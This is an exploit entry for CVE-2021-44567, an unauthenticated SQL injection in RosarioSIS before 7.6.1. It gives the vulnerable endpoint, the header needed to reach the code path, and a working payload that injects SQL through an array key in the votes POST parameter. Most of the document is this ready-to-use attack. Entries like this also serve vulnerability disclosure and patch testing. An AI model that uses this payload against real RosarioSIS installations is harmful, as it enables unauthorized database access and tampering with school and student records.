# Exploit Title: [RosarioSIS < 7.6.1 Unauthenticated SQL Injection via votes Parameter in PortalPollsNotes.fnc.php]
# Date: [2024-10-26]
# Exploit Author: [CodeSecLab]
# Vendor Homepage: [https://gitlab.com/francoisjacquet/rosariosis]
# Software Link: [https://gitlab.com/francoisjacquet/rosariosis]
# Version: [7.6] 
# Tested on: [Ubuntu Windows]
# CVE : [CVE-2021-44567]

PoC:
POST /ProgramFunctions/PortalPollsNotes.fnc.php HTTP/1.1
X-Requested-With: XMLHttpRequest

constrain and some flow:
isset( $_POST['votes'] ) && is_array( $_POST['votes'] ) && $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest' && foreach ( (array) $_POST['votes'] as $poll_id => $votes_array ) && if ( ! empty( $votes_array ) ) && PortalPollsVote( $poll_id, $votes_array ) 

votes['; CREATE TABLE aaa(t text) --]=1